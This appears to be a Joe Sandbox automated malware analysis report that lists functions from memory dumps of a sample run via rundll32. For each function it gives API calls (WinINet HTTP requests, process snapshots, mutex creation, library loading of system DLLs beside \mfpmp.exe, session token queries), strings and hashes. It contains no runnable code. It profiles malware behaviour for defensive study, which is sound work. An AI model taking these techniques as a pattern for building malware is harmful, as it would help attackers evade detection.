Function 0000023CDA68D326 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.1704863145.0000023CDA650000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023CDA650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_23cda650000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
Instruction ID: fa4188962940ec57fa25b025b4b88d1dcc184bf44773832a9a0ff346930fe29f
Opcode Fuzzy Hash: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
Instruction Fuzzy Hash: DBF05474A24F448BD708AF2C884E63577E1F7A8645F64463EB448D7361DB35E5438B83

Function 0000023CDA498149 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4125510573.0000023CDA481000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000023CDA481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23cda481000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9374db516d9e4375f251f78bef5fecbce5b368e01431e898dda6d9a0c6f8720e
Instruction ID: 978feaf23068f87d1f9c58bafceca70a4f9cbcd5a6bb1bc0416af5c9b91fc8a8
Opcode Fuzzy Hash: 9374db516d9e4375f251f78bef5fecbce5b368e01431e898dda6d9a0c6f8720e
Instruction Fuzzy Hash: 9AD0527248EB188EE6249AA8B8873E8B3D0E790228F50482ED18DC2043D63E40468B06

Function 0000023CDA487830 Relevance: 10.8, APIs: 7, Instructions: 340
networkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET ref: 0000023CDA48788A
InternetConnectW.WININET ref: 0000023CDA4878CB
HttpOpenRequestW.WININET ref: 0000023CDA48791F
HttpSendRequestA.WININET ref: 0000023CDA4879DA
InternetQueryDataAvailable.WININET ref: 0000023CDA487A53
RtlReAllocateHeap.NTDLL ref: 0000023CDA487AA4

Part of subcall function 0000023CDA4AB4E0: RtlFreeHeap.NTDLL ref: 0000023CDA4AB51D

InternetCloseHandle.WININET ref: 0000023CDA487B11

Memory Dump Source

Source File: 00000005.00000002.4125510573.0000023CDA481000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000023CDA481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23cda481000_rundll32.jbxd

Similarity

API ID: Internet$HeapHttpOpenRequest$AllocateAvailableCloseConnectDataFreeHandleQuerySend
String ID:
API String ID: 3737532752-0
Opcode ID: d9666d6ee9cc84210a5d48bfb43a1b93f204f5f1cab97c350c418fdf5ba67fc7
Instruction ID: b1ddd43854d2746f0c48b7cfcbada47ac740a6ae7a7dbab8aa46a31acf6d5496
Opcode Fuzzy Hash: d9666d6ee9cc84210a5d48bfb43a1b93f204f5f1cab97c350c418fdf5ba67fc7
Instruction Fuzzy Hash: CDB1F834218A0C8FF758DF28E8597AAB7D5FB98304F24557DB84AD3291DFB8D9018782

Function 00007FFDFA908344 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

new.LIBCMT ref: 00007FFDFA9083EE
new.LIBCMT ref: 00007FFDFA908401
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA908463

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA908469
std::_Deallocate.LIBCONCRT ref: 00007FFDFA908487

Strings

enableSRS1364, xrefs: 00007FFDFA908395

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_taskExceptionThrow$Deallocatestd::_std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID: enableSRS1364
API String ID: 2759354802-1359322883
Opcode ID: 01bd3773f0eb2a558a1897b6c9c6b57b574b912d968410f7a26ad8025ae356bc
Instruction ID: 3c1444c27739e1fe6265799979a4466866a66105cbbbf4fcad925f3bb4696b38
Opcode Fuzzy Hash: 01bd3773f0eb2a558a1897b6c9c6b57b574b912d968410f7a26ad8025ae356bc
Instruction Fuzzy Hash: 77315E76B25A5681EF18CB29D4A06393360EB54BE4F988771DA7E437D8CF3CE5668300

Function 00007FFDFA8B2D25 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_Init_thread_footer.LIBCMT ref: 00007FFDFA8B2D33

Part of subcall function 00007FFDFA9466A0: EnterCriticalSection.KERNEL32 ref: 00007FFDFA9466B0
Part of subcall function 00007FFDFA9466A0: LeaveCriticalSection.KERNEL32 ref: 00007FFDFA9466F0

QueryPerformanceCounter.KERNEL32 ref: 00007FFDFA8B2D7C

Part of subcall function 00007FFDFA946700: EnterCriticalSection.KERNEL32 ref: 00007FFDFA946710

QueryPerformanceFrequency.KERNEL32 ref: 00007FFDFA8B2D5F

Strings

)9, xrefs: 00007FFDFA8B2D72

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterPerformanceQuery$CounterFrequencyInit_thread_footerLeave
String ID: )9
API String ID: 2428000217-1805338887
Opcode ID: 2ba064750abb0480fc47005e460bd415229348ce2235b756271b4d4ff3ee25c1
Instruction ID: 6bf0b16949d8224b245c86fc7453ef4e797f12d00b95cf3d416b1c4957cdef41
Opcode Fuzzy Hash: 2ba064750abb0480fc47005e460bd415229348ce2235b756271b4d4ff3ee25c1
Instruction Fuzzy Hash: 34019A31B18A0386FB48DF24F8618A43670AF55358BE002B6D67D811F9DF2CA94A8644

Function 00007DF4877C0000 Relevance: 6.1, APIs: 4, Instructions: 88processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007DF4877C0052
Process32First.KERNEL32 ref: 00007DF4877C008B
CloseHandle.KERNEL32 ref: 00007DF4877C00C1

Memory Dump Source

Source File: 00000005.00000003.2065466444.00007DF4877C0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4877C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_7df4877c0000_rundll32.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
String ID:
API String ID: 1083639309-0
Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
Instruction ID: 47cf0fb58b95cfa442b9f796054360512410232919b03a10ed3c6079221b7e76
Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
Instruction Fuzzy Hash: C721DF3061494C8FEBA1EB5CDC58BEA37E1FB98310F404226D82EDB290DE35EA84D750

Function 00007FFDFA8B2E0C Relevance: 4.5, APIs: 3, Instructions: 40
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFDFA946700: EnterCriticalSection.KERNEL32 ref: 00007FFDFA946710

GetCurrentProcess.KERNEL32 ref: 00007FFDFA8B2E67
GetProcessTimes.KERNEL32 ref: 00007FFDFA8B2E85
_Init_thread_footer.LIBCMT ref: 00007FFDFA8B2EAB

Part of subcall function 00007FFDFA9466A0: EnterCriticalSection.KERNEL32 ref: 00007FFDFA9466B0
Part of subcall function 00007FFDFA9466A0: LeaveCriticalSection.KERNEL32 ref: 00007FFDFA9466F0

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterProcess$CurrentInit_thread_footerLeaveTimes
String ID:
API String ID: 816428697-0
Opcode ID: f5dcc11f3405eaa559cfcd6a0ccef3154b8c7c602b6e6a17d5af2eea432bee2d
Instruction ID: d92d89a8c6995bad38ba02add347ad75e4289f8fbe62df3385470bf0bdceeb1d
Opcode Fuzzy Hash: f5dcc11f3405eaa559cfcd6a0ccef3154b8c7c602b6e6a17d5af2eea432bee2d
Instruction Fuzzy Hash: 50110D71B04F4389EB18DF65E8618A83364FB487A8B800676E67D436EDDF38E559C350

Function 0000023CDA488ED0 Relevance: 1.9, APIs: 1, Instructions: 410
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExA.KERNEL32 ref: 0000023CDA488F00

Memory Dump Source

Source File: 00000005.00000002.4125510573.0000023CDA481000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000023CDA481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23cda481000_rundll32.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
Instruction ID: c6e1a20cf534259025fbdcdfbdb4a45121a2fd9a0f63acf0cb83cc5fe6fdaccc
Opcode Fuzzy Hash: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
Instruction Fuzzy Hash: 0DE12E71408A0D8FE751EF14E895BE6BBF4F768340F20067BE84AC2661DB38D245CB86

Function 00007FFDFA90B1D0 Relevance: 1.6, APIs: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

new.LIBCMT ref: 00007FFDFA90B216

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a4865ae393b65fef10d762c666cd9c44e77604b0d98e351f75fb3dfe303f975
Instruction ID: e6e733022d27b12e318f1744cfaab11c995670b35d5f30723f04d15b1bc7bf8a
Opcode Fuzzy Hash: 7a4865ae393b65fef10d762c666cd9c44e77604b0d98e351f75fb3dfe303f975
Instruction Fuzzy Hash: 0661FD36A09F49C6D784DB16F89166873A4FB4CB94F108276D96D433A4EF38E16EC341

Function 00007FFDFA909004 Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

new.LIBCMT ref: 00007FFDFA909035

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9989ac622d0bbe4050e0be70778010576c1ed825d4c0edf47f18dfa3c26afa54
Instruction ID: 37d3b263f65809b8751236ea1e74d4d6316787a4e236f862f0ea44cb3ab8cd1a
Opcode Fuzzy Hash: 9989ac622d0bbe4050e0be70778010576c1ed825d4c0edf47f18dfa3c26afa54
Instruction Fuzzy Hash: 67217967308B9482DB288B26E450769B770F794BD0F488672DBAD4B7D8CF38E455C340

Function 0000023CDA4AB4E0 Relevance: 1.5, APIs: 1, Instructions: 35
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL ref: 0000023CDA4AB51D

Memory Dump Source

Source File: 00000005.00000002.4125510573.0000023CDA481000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000023CDA481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23cda481000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
Instruction ID: 3aee903e0ab9ca03d3859424e94b97ba2fd2923af15ce73f09b1cdb82c8a2f69
Opcode Fuzzy Hash: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
Instruction Fuzzy Hash: 39F01C34310E088BFB58E7BAECC976537E2FB9C349F558064A405DA194DF389941C701

Function 00007FFDFA8B2DEA Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_Init_thread_footer.LIBCMT ref: 00007FFDFA8B2DF8

Part of subcall function 00007FFDFA9466A0: EnterCriticalSection.KERNEL32 ref: 00007FFDFA9466B0
Part of subcall function 00007FFDFA9466A0: LeaveCriticalSection.KERNEL32 ref: 00007FFDFA9466F0

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterInit_thread_footerLeave
String ID:
API String ID: 3960375172-0
Opcode ID: c5947d29cb0026eff81cbd50f8bf128efe6ae772932f805a0bfbed681eda9c15
Instruction ID: ca2903afe43078bfd763e0055349f131c644a17228e4403fd7c28d118b1c8ef2
Opcode Fuzzy Hash: c5947d29cb0026eff81cbd50f8bf128efe6ae772932f805a0bfbed681eda9c15
Instruction Fuzzy Hash: FEC04C20F0DD02A6FB089F14E86186173706F5430CFE001B3C52C452F9DF2CAA5A8248

Function 00007FFDFA98F4E8 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FFDFA9907FD,?,?,00004C255E491641,00007FFDFA97D349,?,?,?,?,00007FFDFA98CE56,?,?,00000000), ref: 00007FFDFA98F53D

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: e0a29bd916060aefa256d38e932ce86357349a5841898a5f46e866a523d20305
Instruction ID: 787da788de7a05c1ce803a60fcd5e9b233b5d8d375450bf49a6ae618f45b4b5b
Opcode Fuzzy Hash: e0a29bd916060aefa256d38e932ce86357349a5841898a5f46e866a523d20305
Instruction Fuzzy Hash: B4F06269B0920741FF6C5E61A670AB913845F98B44FCCA0B0C92ECE2D9DE2CE4818234

Function 00007FFDFA98CDC0 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FFDFA991566,?,?,00000000,?,?,00007FFDFA9918D2), ref: 00007FFDFA98CDFE

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 6db678ebbd684dba6e48db42fee9dfd296a3721e1ba496f89583ae119ae3c92c
Instruction ID: c87287f8583f95e62a04fd70bc4c4968e9dea21a4ca25f327ce99a21eaadfc89
Opcode Fuzzy Hash: 6db678ebbd684dba6e48db42fee9dfd296a3721e1ba496f89583ae119ae3c92c
Instruction Fuzzy Hash: FBF01251F1920745FF7C66615861A7913846F847A0FC886B4DD3ECE2DADE2CA8518A60

Function 0000023CDA68CA56 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.1704863145.0000023CDA650000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023CDA650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_23cda650000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6258ad962565a3180bb006997aefc3c2d41d9dd5a2811c72a17a211375779bb6
Instruction ID: 10b8247e2935c2667c8a4d56d49830039dabaae90d70641b1d7b81d9894e5daf
Opcode Fuzzy Hash: 6258ad962565a3180bb006997aefc3c2d41d9dd5a2811c72a17a211375779bb6
Instruction Fuzzy Hash: 9401F92521991E4BE79DE77968D47A2B6DAF7D4310F684076E808D72C5D82CCA424340

Non-executed Functions

Function 00007FFDFA8AA83C Relevance: 44.0, APIs: 18, Strings: 7, Instructions: 209libraryCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FFDFA8AA88D
LoadLibraryExW.KERNEL32 ref: 00007FFDFA8AA9FD
GetLastError.KERNEL32 ref: 00007FFDFA8AAA0F
LoadLibraryExW.KERNEL32 ref: 00007FFDFA8AAA2E
GetLastError.KERNEL32 ref: 00007FFDFA8AAA40
LoadLibraryExW.KERNEL32 ref: 00007FFDFA8AAA5F
LoadLibraryExW.KERNEL32 ref: 00007FFDFA8AAA76
GetLastError.KERNEL32 ref: 00007FFDFA8AAA88
LoadLibraryExW.KERNEL32 ref: 00007FFDFA8AAAA7
GetLastError.KERNEL32 ref: 00007FFDFA8AAAB9
LoadLibraryExW.KERNEL32 ref: 00007FFDFA8AAAD8
GetLastError.KERNEL32 ref: 00007FFDFA8AAAEA
LocalFree.KERNEL32 ref: 00007FFDFA8AAB04
LocalFree.KERNEL32 ref: 00007FFDFA8AAB0D
LocalFree.KERNEL32 ref: 00007FFDFA8AAB16
LocalFree.KERNEL32 ref: 00007FFDFA8AAB1F
LocalFree.KERNEL32 ref: 00007FFDFA8AAB28
LocalFree.KERNEL32 ref: 00007FFDFA8AAB33

Strings

cryptnet.dll, xrefs: 00007FFDFA8AA95D, 00007FFDFA8AA96E
msasn1.dll, xrefs: 00007FFDFA8AA941, 00007FFDFA8AA952
wldp.dll, xrefs: 00007FFDFA8AA995, 00007FFDFA8AA9A3
\mfpmp.exe, xrefs: 00007FFDFA8AA8A1, 00007FFDFA8AA8D5
cryptbase.dll, xrefs: 00007FFDFA8AA979, 00007FFDFA8AA98A
drvstore.dll, xrefs: 00007FFDFA8AA9B3, 00007FFDFA8AA9C4
devobj.dll, xrefs: 00007FFDFA8AA9CF, 00007FFDFA8AA9E0

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: FreeLibraryLoadLocal$ErrorLast$FileModuleName
String ID: \mfpmp.exe$cryptbase.dll$cryptnet.dll$devobj.dll$drvstore.dll$msasn1.dll$wldp.dll
API String ID: 2075666388-3852175644
Opcode ID: 5b3b243193d4b28ed12cc47018abf45ed49fbc8cec7d705be69abaea25e175cb
Instruction ID: 136ba8619a7e4d5880bfc799f21d37d5b70a6e42eb4b67a2f9f855eaf69611b6
Opcode Fuzzy Hash: 5b3b243193d4b28ed12cc47018abf45ed49fbc8cec7d705be69abaea25e175cb
Instruction Fuzzy Hash: 1C919325B3DA4391FB6CCB15A870975A390BF48B40F9444B5D87E86AECEE7DF4468320

Function 00007FFDFA8ADCBC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 202registrystringCOMMON

Download Yara Rule

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 00007FFDFA8ADCFB
WTSEnumerateSessionsW.WTSAPI32 ref: 00007FFDFA8ADD33
WTSFreeMemory.WTSAPI32 ref: 00007FFDFA8ADD7F
WTSQueryUserToken.WTSAPI32 ref: 00007FFDFA8ADD94
GetLastError.KERNEL32 ref: 00007FFDFA8ADD9E
SetupDiGetClassDevsW.SETUPAPI ref: 00007FFDFA8ADDC6
GetLastError.KERNEL32 ref: 00007FFDFA8ADDD5
SetupDiGetDeviceInstanceIdW.SETUPAPI ref: 00007FFDFA8ADE1E
GetLastError.KERNEL32 ref: 00007FFDFA8ADE28
